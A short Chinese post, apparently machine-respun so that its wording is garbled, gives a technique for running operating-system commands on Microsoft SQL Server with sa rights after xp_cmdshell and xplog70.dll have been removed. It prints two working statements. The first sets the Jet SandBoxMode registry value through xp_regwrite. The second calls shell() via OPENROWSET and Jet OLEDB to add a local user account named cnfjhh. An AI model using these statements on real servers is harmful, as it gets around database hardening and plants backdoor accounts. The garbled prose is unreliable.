cmdshell和xplog70.dll也执行呼吁

sa下删除xp_cmdshell和xplog70.dll时候的一种步伐，不算新的了， 也被一些人不绝的再次提出来，为了利便本身影象再写出来， 在这种环境下，要执行呼吁，条件是要有xp_regwrite。

首先开启沙盘模式：

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1


然后操作jet.oledb执行系统呼吁

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user cnfjhh fst /add")')

您大概感乐趣的文章: